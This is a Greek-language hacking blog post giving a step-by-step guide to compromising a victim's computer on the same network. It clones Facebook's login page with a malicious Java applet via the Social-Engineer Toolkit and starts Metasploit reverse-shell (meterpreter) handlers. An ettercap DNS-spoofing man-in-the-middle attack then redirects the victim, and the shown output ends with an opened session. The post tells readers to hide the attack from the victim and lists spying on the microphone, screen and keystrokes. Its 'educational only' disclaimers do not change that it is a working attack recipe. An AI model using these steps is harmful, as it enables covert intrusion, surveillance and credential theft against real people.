meta name="poptm" content="dbafe4700287d277c5f53c46b0916f37" /> XL-Satsok Track Ware : Πως εισβαλω σε ενα υπολογιστη παρα πολυ ευκολα

Πως εισβαλω σε ενα υπολογιστη παρα πολυ ευκολα


*ΠΡΟΣΟΧΗ αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε τριτα ατομα χωρις να το γνωριζουν. Δεν φερω καμια ευθυνη αν εφαρμοστει κακοβουλα*

Τι θα χρειαστειτε;

1.Backtrack 5 R1

-Ανοιγουμε το SET θα το βρειτε στο Social Engineer Tools


επιλεγουμε 1 - Social-Engineering Attacks
2 - Website Attack Vectors
1 - Java Applet Attack Method
2 - Site Cloner
βαζουμε την σελιδα που θελουμε να κλωνοποιησουμε και να τσιμπισει το θυμα πχ το facebook οποτε γραφω www.facebook.com και μας εμφανιζει αυτο

Cloning the website: https://login.facebook.com/login.php
This could take a little bit...
Injecting Java Applet attack into the newly cloned website.
Filename obfuscation complete. Payload name is: jBcXL2pFDSM
Malicious java applet website prepped for deployment


-επιλεγουμε 7 - Windows Meterpreter Reverse_TCP X64 (Connect back to the attacker Windows x64), Meterpreter *μπορειτε να διαλεξετε οτι θελετε απλα το 7 δουλευει σε vista και windows 7

-PORT of the listener [443]: βαζω οτι θελω πχ 4444 η πατατε enter και μπενει η προεπιλεγμενη 443 θυρα

-και σας ανοιγει το metasploit ......
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
[--] Apache web server is currently in use for performance. [--]
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##



=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 775 exploits - 411 auxiliary - 121 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14417 updated 6 days ago (2011.12.15)

[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.67
LHOST => 192.168.1.67
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
InitialAutoRunScript => post/osx/gather/enum_osx
resource (src/program_junk/meta_config)> set ExitOnSession false
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.67
LHOST => 192.168.1.67
resource (src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Started reverse handler on 192.168.1.67:8080
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.67:8081
[*] Starting the payload handler...


-τωρα το μονο που μενει ειναι να κανουμε το θυμα να ενωθει σε εμας

οποτε παμε και ανοιγουμε ενα τερματικο και γραφουμε cd /usr/local/share/ettercap/ και μετα nano etter.dns και γραφουμε *.facebook.* A 192.168.1.67 * την ip μας δλδ ετσι


-παταω ctrl+x , y και enter για να το αποθηκευσει

-μετα ανοιγω το ettercap παταω shift+u Network interface : wlan0

-ctrl+s και μετα h και προσθετω σαν target 1 το ρουτερ και target 2 το θυμα

-ctrl+p και επιλεγω dns_spoof

-ctrl+w και περιμενω να δω αυτο
[*] Sending stage (946176 bytes) to 192.168.1.73
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.73:63608) at 2011-12-21 17:29:06 +0200

-παταω enter και γραφω sessions -i 1 * σταματαω το mitm attack του ettercap και το κλεινω

-και ειμαστε ετοιμοι.... εχουμε εισβαλει *αν γραψουμε help θα μας εμφανισει εντολες που μπορουμε να γραψουμε οπως να ακουω απο το μικροφωνο του θυματος να βλεπω την επιφανεια εργασιας του,να γραφω τα πληκτρα που παταει κτλ

-Το θυμα μας οταν παει να μπει στο facebook θα του εμφανιστει αυτο


-θα πατησει run και θα μας ''ανοιξει την πορτα να εισβαλουμε'' χωρις να καταλαβει τι εγινε .....απλα μετα πατηστε στο ettercap stop mitm attack για να μην κινησεις υποψια.


--*Oι οδηγοι μου ειναι για εκπαιδευτικους σκοπους μονο.
Εφαρμοζοντας τους κακοβουλα σε τριτα ατομα ειναι με δικια σας ευθυνη καθως μερικοι απο αυτους ειναι παρανομοι
*--